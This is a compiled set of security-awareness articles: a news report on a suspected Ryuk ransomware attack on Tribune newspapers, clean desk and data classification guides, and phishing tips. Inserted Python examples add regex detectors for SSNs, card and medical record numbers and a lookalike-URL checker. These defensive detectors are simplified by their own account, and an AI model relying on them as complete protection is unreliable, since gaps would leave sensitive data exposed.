At one point, Times staffers were making contingency plans to hand-deliver pages from the editorial offices in El Segundo to its Olympic printing plant in downtown Los Angeles. Working through the problems created a logjam at the plant, and the resulting cascade of delays pushed back printing and delivery.

San Diego was particularly hard hit by the problem, in large part because of the paper’s position in the press run. Between 85% and 90% of the Saturday edition of the Union-Tribune did not reach subscribers on Saturday morning, said Jeff Light, publisher and editor of the San Diego Union-Tribune.

“Papers that should have arrived in San Diego around 3 a.m. to 4 a.m. instead arrived at 7 a.m. and 8 a.m.” Light said. Because the newspaper relies on independent contractors to deliver the paper to neighborhoods, many of those people were not available later in the day to do the deliveries.

The first signs of trouble at the Union-Tribune came late Thursday night when sports editors tried to send information, via digital files, to the plate-making facility. But those digital files which contain information that ultimately becomes the pages of the newspaper would not transmit to the plate-making process. Editors seemed to be locked out of the system, having to perform work-arounds.

The transmission of community editions, including the Glendale News Press and Burbank Leader, also appeared in doubt Friday night. Ultimately, a page designer in Orange County figured out he could send all the community papers’ news pages from his unaffected computer, said John Canalis, executive editor of Times Community News.

The problem caused widespread issues in South Florida, one of Tribune Publishing’s major markets. The South Florida Sun Sentinel told readers that it had been “crippled this weekend by a computer virus that shut down production and hampered phone lines,” according to a story on its website.

Malware attacks are extremely common, affecting millions of computers in homes, offices and other organizations every day, said Salim Neino, chief executive of the company Kryptos Logic.

In some cases, dubbed “ransomware,” the attackers disable the system and demand money, said Neino, whose company tackled a major ransomware attack called WannaCry last year.

In other instances, the goal is simply to disrupt or “break stuff” by wiping systems, Neino said. Malware has also been used to quietly infect computers and then sell access to other cybercriminals, who can steal banking credentials or exploit other valuable information, Neino said.

Several individuals with knowledge of the Tribune situation said the attack appeared to be in the form of “Ryuk” ransomware. One company insider, who was not authorized to comment publicly, said the corrupted Tribune Publishing computer files contained the extension “.ryk.”

“Ryuk” attacks are “highly targeted, well-resourced and planned,” according to an August advisory by the U.S. Department of Health and Human Services’ cybersecurity program. Victims are deliberately targeted and “only crucial assets and resources are infected in each targeted network.”

It was unclear whether company officials have been in contact with law enforcement regarding the suspected attack. But Katie Waldman, a spokeswoman for the Department of Homeland Security, said “we are aware of reports of a potential cyber incident affecting several news outlets, and are working with our government and industry partners to better understand the situation.”

Tribune declined to comment on the specifics of the malware attack.

Neino also said that tracking the identity of attackers can be difficult since malware code is often freely distributed online.

For instance, even if an attack appears to be Russian because of the “malware family traits,” Neino said, “code still could have been sourced, weaponized and deployed by an actor who downloaded it from an underground forum anywhere in the world.”

Pam Dixon, executive director of the World Privacy Forum, a nonprofit public interest research group, said that “usually when someone tries to disrupt a significant digital resource like a newspaper, you're looking at an experienced and sophisticated hacker.”

Dixon added that the holidays are "a well known time for mischief" by digital troublemakers, because organizations are more thinly staffed.

"It's an optimal time to attack a major target," she said.

The highest-profile cyberattack on a media company was in late 2014 at Sony Pictures Entertainment in Culver City. Hackers, who the FBI later determined were affiliated with the North Korean government, broke into Sony Pictures’ computer system and copied huge chunks of data, which they later posted online for the world to see.

Resource: https://www.latimes.com/local/lanow/la-me-ln-times-delivery-disruption-20181229-story.html


5 Benefits to Having a Clean Desk Policy

One of the simplest ways to become compliant with basic privacy and security principles, increase productivity, and have a great-looking office is to implement a Clean Desk Policy.

A clean desk policy and a clear screen policy work hand-in-hand to safeguard your organization’s sensitive information.

What is a Clean Desk Policy?

A clean desk policy requires all employees to clear their desks at the end of each work day. This includes not only documents and notes but also post-it notes, business cards, and removable media (e.g. USB memory sticks).

Following a clean desk policy will help your organization reduce the risk of information theft, fraud, or a security breach caused by sensitive information being left unattended and visible in plain view.

The Benefits of a Clean Desk Policy

A clean desk policy should be adopted because of the numerous benefits it can provide your organization.

1. Save Time and Money

A clean desk policy will encourage employees to use digital versions of documents, significantly reducing your organization’s costs of paper, ink toner, and printer maintenance.

2. Make Good Impressions

You never know who will visit your office, or when. A clean and tidy workspace makes your organization look efficient and presentable to anyone who decides to visit, including the auditors!

3. Easy ISO Compliance

A clean desk policy is not only ISO 27001/17799 compliant, it also complies with basic privacy principles.

4. Discourages Prying Eyes

Employees usually leave sensitive information on their desk.

Post-it notes are usually the worst culprit, containing names, phone numbers, and even user names and passwords visible in plain view. These habits encourage dishonest employees, cleaning crews, and maintenance staff to view information they should not have access to.

5. Reduce Stress

A place for everything and everything in its place. When your employees are organized they can spend more time concentrating on work rather than feeling stressed because they can’t find a report due in the next 10 minutes.

Implementing a Clean Desk Policy

You are convinced that your organization needs a clean desk policy. Great! Here are a few steps to help you implement a policy.

Put it in Writing

A clean desk policy should be in writing and communicated to all employees, especially during introductory and refresher training. Consequences for failure to comply should be serious yet practical, especially if your organization handles a great deal of sensitive information. Have all employees sign the document for approval.

Add a Reminder to Email Signatures

You have probably seen it below many email signatures: Please consider the environment before printing this email. If your organization uses standardized email signatures, consider having this reminder added to the bottom.

Lockable Storage

You can’t implement a clean desk policy if there is nowhere for employees to put their documents. Consider purchasing small, lockable storage boxes for employees that fit under their desks.

Encourage Electronic Documents

Have employees work with electronic documents whenever possible. Without the need to print and work with physical papers, your employees will always have a clear desk whenever they log out of their computers.

Get Rid of Documents Securely

Your employees should never throw any work-related documents into the waste basket. Once garbage leaves your company’s doors, it becomes public property. Nothing can ruin your organization quicker than careless employees throwing sensitive information into a waste basket. Your organization does not want to be on the front page of the newspaper for exposing sensitive information.

Perform Routine Backups

If you discourage employees from using physical documents, make sure your organization has a dependable backup routine in place. Employees need to know that their documents will be safe in the event of a power loss or hard-drive crash.

Enforcing a Clean Desk Policy

Implementing a clean desk policy and having a nonchalant attitude towards enforcement will render your policy useless.

Random Checks

Have someone conduct random weekly checks, possibly at the end of a work day. All papers, notes, post-its, or any other documents containing sensitive information should be shredded immediately. Removable media, such as CDs, floppy disks, or memory sticks, can be confiscated temporarily.

Upper Management Support

A clean desk policy needs to be taken seriously — especially with all levels of management. If your employees see that upper management does not have to abide by the policy, they will soon lose faith.

The fact that upper management usually handles more sensitive documents should reinforce the need for a clean desk policy for all employees regardless of their status within the organization.

Resource: http://www.privacysense.net/clean-desk-policy/


7 Steps to Effective Data Classification

In today’s security landscape, data protection is not just a legal necessity, it’s critical to organizational survival and profitability.

Storage is cheap, and organizations have become data hoarders. One day — they think — they’ll get around to mining all of that data for something useful. But data hoarding can cause serious issues. Much of what is collected may be redundant, obsolete, trivial (ROT) or unknown (dark), and hasn’t been touched in years.

Storage may be cheap, but it’s not free. Storing massive amounts of data unnecessarily increases costs and more importantly, it puts your organization at risk.

Sensitive information that is stored digitally — including intellectual property, personally identifying information about customers or employees, such as social security numbers, protected health information (PHI) and/or financial account information and credit card details — needs to be properly secured. Your organization is not secure if finding important data is like looking for a needle in a haystack.

Keys to Success

While data classification is the foundation of any effort to ensure sensitive data is handled appropriately, many organizations fail to set the right expectations and approach. This leads implementations to become overly complex and fail to produce practical results.

There are 7 steps to effective data classification:

  1. Complete a risk assessment of sensitive data. Ensure a clear understanding of the organization’s regulatory and contractual privacy and confidentiality requirements and define your data classification objectives through an interview-based approach that involves key stakeholders, including compliance, legal and business unit leaders.
  2. Develop a formalized classification policy. Resist the urge to get too granular, as granular classification schemes tend to cause confusion and become unmanageable. Three to four classification categories is reasonable. Solidify employees’ roles and responsibilities. Policies and procedures should be well-defined, aligned with the sensitivity of specific data types, and easily interpreted by employees.
  3. Categorize the types of data. Determining what types of sensitive data exist within your organization can present challenges. It is an effort that should be organized around business processes and driven by process owners. Consider each business process – tracking the flow of data provides insight into what data needs to be protected, and how it should be protected. Consider the following questions:
     • What customer and partner data does your organization collect?
     • What data do you create about them?
     • What proprietary data do you create?
     • What transactional data do you deal with?
     • Of all the collected and created data, what is confidential?
  4. Discover the location of your data. After establishing the types of data in your organization, it’s important to catalog all of the places data is stored electronically. The flow of data into and out of the organization is a key consideration. How does your organization store and share data internally and externally? Do you use cloud-based services like Dropbox, Box, OneDrive, etc.? What about mobile devices?

Data discovery tools can help generate an inventory of unstructured data and help you understand exactly where your company’s data is stored, regardless of the format or location. These tools also help address difficulties around identifying data owners by providing insights about users who are handling data. In your discovery efforts, you can incorporate key words or specific types or formats of data, such as medical record numbers, social security numbers or credit card numbers.

  5. Identify and classify data. Only after you know where your data is stored can you identify and then classify it, so it’s appropriately protected. Consider the penalties associated with a loss or breach. For example, what fines can be levied per record for a HIPAA breach involving protected health information? Insight into the potential costs associated with the compromise of a data set will enable you to set expectations for the cost to protect it and which classification level to set.

Commercial classification tools support data classification initiatives by facilitating the determination of appropriate classifications and then applying the classification label either to the metadata of the item or as a watermark. Robust classification systems offer user-driven, system-suggested and automated capabilities:

     • Provision of a menu of tailored data classification options.
     • Detection of content within a data item followed by the offering of classification options for selection by the user.
     • Automation through which the system selects the appropriate classification based on analysis engines with limited (if any) user input.
  6. Enable controls. Establish baseline cybersecurity measures and define policy-based controls for each data classification label to ensure the appropriate solutions are in place. High-risk data requires more advanced levels of protection while lower-risk data requires less protection. By understanding where data resides and the organizational value of the data, you can implement appropriate security controls based on associated risks. Classification metadata can be used by data loss prevention (DLP), encryption and other security solutions to determine what information is sensitive and how it should be protected.
  7. Monitor and maintain. Be prepared to monitor and maintain the organization’s data classification system, making updates as necessary. Classification policies should be dynamic. You need to establish a process for review and update that involves users to encourage adoption and ensure your approach continues to meet the changing needs of the business.
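An added example, not from the article or its source, of what the discovery, classification and control steps look like in code: a small Python scanner that looks for the identifier types named above (social security numbers, card numbers, medical record numbers) in a set of constructed sample documents, suggests one of a four-level label scheme, and lets a label-driven DLP rule consume that metadata. The regexes, the sample documents, the label names and the destination policy are all assumptions for illustration; a real discovery tool carries far more detectors.

```python
import re

# Detectors for the data types the article names; the Luhn check below removes
# most card-number false positives such as order numbers. Patterns are simplified.
SSN_RE = re.compile(r"\b(?!000|666|9\d\d)\d{3}-(?!00)\d{2}-(?!0000)\d{4}\b")
CARD_RE = re.compile(r"\b(?:\d[ -]?){13,16}\b")
MRN_RE = re.compile(r"\bMRN[:# ]\s*\d{6,10}\b", re.IGNORECASE)
CONF_RE = re.compile(r"\b(confidential|proprietary|internal only)\b", re.IGNORECASE)

# Constructed sample documents standing in for a file share (not real data).
SAMPLE_DOCS = {
    "hr/onboarding.txt": "New hire Jane Doe, SSN 123-45-6789, start date 2019-02-01.",
    "finance/refunds.txt": "Refund to card 4111 1111 1111 1111; order 1234 5678 9012 3456.",
    "clinic/visit.txt": "Patient seen 12 Jan. MRN: 00482913. Follow-up in 2 weeks.",
    "sales/roadmap.txt": "CONFIDENTIAL: proprietary Q3 roadmap, do not distribute.",
    "marketing/press.txt": "Press release: new office opens in Swanzey.",
}

# Step 6: controls keyed on the label (constructed policy, not from the article).
ALLOWED_DESTINATIONS = {
    "RESTRICTED": {"internal-share"},
    "CONFIDENTIAL": {"internal-share", "email-internal"},
    "INTERNAL": {"internal-share", "email-internal", "email-external"},
}

def luhn_ok(digits: str) -> bool:
    """Return True when the digit string passes the Luhn checksum."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0

def find_sensitive(text: str) -> dict:
    """Step 4: count each sensitive data type found in one document."""
    cards = [m.group(0) for m in CARD_RE.finditer(text)
             if luhn_ok(re.sub(r"[ -]", "", m.group(0)))]
    return {"ssn": len(SSN_RE.findall(text)), "card": len(cards),
            "mrn": len(MRN_RE.findall(text))}

def classify(text: str) -> tuple:
    """Step 5: suggest a label, highest applicable level first. Automation never
    downgrades to PUBLIC; that stays a user-driven decision."""
    findings = find_sensitive(text)
    if any(findings.values()):
        return "RESTRICTED", findings
    if CONF_RE.search(text):
        return "CONFIDENTIAL", findings
    return "INTERNAL", findings

def dlp_allows(label: str, destination: str) -> bool:
    """Step 6: label-driven DLP decision for a proposed transfer."""
    return destination in ALLOWED_DESTINATIONS.get(label, set())

# Steps 4 and 5 together: the inventory a discovery tool would produce for the share.
INVENTORY = {path: classify(text)[0] for path, text in SAMPLE_DOCS.items()}
```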

Be Selective

Full data classification is an expensive and cumbersome activity that few companies are equipped to handle. A good retention policy can help whittle down data sets and facilitate your efforts. Start by selecting specific types of data to classify in line with your confidentiality requirements, adding more security for increasingly confidential data.

All Data is Not Created Equal

From the time information is created until it is destroyed, data classification can help your organization ensure it is effectively protected, stored and managed. Putting data classification at the heart of your data protection strategy allows you to reduce risks to sensitive data, enhance decision-making and increase the effectiveness of DLP, encryption and other security controls. By creating a straightforward classification scheme, comprehensively assessing and locating data, and implementing the right solutions, your organization can benefit from a simplified, streamlined way to ensure that sensitive data is handled appropriately and reduce threats to your business.

Resource: https://www.siriuscom.com/2018/03/7-steps-effective-data-classification/


Spam and Phishing: Avoid Being a Victim

Cybercriminals have become quite savvy in their attempts to lure people in and get you to click on a link or open an attachment.

Tips for Avoiding Being a Victim

  • Don’t reveal personal or financial information in an email, and do not respond to email solicitations for this information. This includes following links sent in email.
  • Before sending or entering sensitive information online, check the security of the website.
  • Pay attention to the website’s URL. Malicious websites may look identical to a legitimate site, but the URL may use a variation in spelling or a different domain (e.g., .com versus .net).
  • If you are unsure whether an email request is legitimate, try to verify it by contacting the company directly. Contact the company using information provided on an account statement, not information provided in an email. Check out the Anti-Phishing Working Group (APWG) to learn about known phishing attacks and/or report phishing.
  • Keep a clean machine. Keep all software on internet-connected devices – including PCs, smartphones and tablets – up to date to reduce the risk of infection from malware.
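The URL tip above can be partly automated. As an added example, not from the article or its source, this Python check compares the host of a link against a constructed allow-list of trusted domains and flags the two tricks the tip names, a spelling variation and a different top-level domain, plus a trusted name reused as a subdomain of some other domain. TRUSTED, the function names and the sample URLs are assumptions; the registrable-domain logic is deliberately simplified and does not use a public-suffix list.

```python
from urllib.parse import urlsplit

# Constructed allow-list of domains this organization expects links to use.
TRUSTED = ["example.com", "example-bank.com"]

def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance: catches one- or two-character spelling tweaks."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def registrable(host: str) -> str:
    """Last two labels of a host ('www.example.com' -> 'example.com').
    Simplified: no public-suffix list, so 'co.uk'-style suffixes are not handled."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])

def check_url(url: str) -> str:
    """Classify a link target as 'trusted', 'different-tld', 'lookalike',
    'embedded-name' (a trusted name used as a subdomain elsewhere) or 'unknown'."""
    host = urlsplit(url).hostname or ""   # parsed hostname, not the raw netloc text
    domain = registrable(host)
    if domain in TRUSTED:
        return "trusted"
    if any(t in host for t in TRUSTED):
        return "embedded-name"
    name, _, tld = domain.rpartition(".")
    for trusted in TRUSTED:
        t_name, _, t_tld = trusted.rpartition(".")
        if name == t_name and tld != t_tld:
            return "different-tld"      # e.g. .com versus .net
        if edit_distance(name, t_name) <= 2:
            return "lookalike"          # spelling variation of a trusted name
    return "unknown"
```

Anything other than "trusted" is a prompt to verify the request through a channel you already have, such as the phone number on an account statement, rather than by following the link.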

What to Do if You Are a Victim

  • Report it to the appropriate people within the organization, including network administrators. They can be alert for any suspicious or unusual activity.
  • If you believe your financial accounts may be compromised, contact your financial institution immediately and close the account(s).
  • Watch for any unauthorized charges to your account.
  • Consider reporting the attack to your local police department, and file a report with the Federal Trade Commission or the Internet Crime Complaint Center.

Protect Yourself With These STOP. THINK. CONNECT.™ Tips

  • When in doubt, throw it out: Links in email, tweets, posts and online advertising are often how cybercriminals try to compromise your information. If it looks suspicious, even if you know the source, it’s best to delete or – if appropriate – mark it as junk.
  • Think before you act: Be wary of communications that implore you to act immediately, offer something that sounds too good to be true or ask for personal information.
  • Make your password a sentence: A strong password is a sentence that is at least 12 characters long. Focus on positive sentences or phrases that you like to think about and are easy to remember (for example, “I love country music.”). On many sites, you can even use spaces!
  • Unique account, unique password: Having separate passwords for every account helps to thwart cybercriminals. At a minimum, separate your work and personal accounts and make sure that your critical accounts have the strongest passwords.
  • Lock down your login: Fortify your online accounts by enabling the strongest authentication tools available, such as biometrics, security keys or a unique one-time code through an app on your mobile device. Your usernames and passwords are not enough to protect key accounts like email, banking and social media.

Resource: https://staysafeonline.org/stay-safe-online/online-safety-basics/spam-and-phishing/
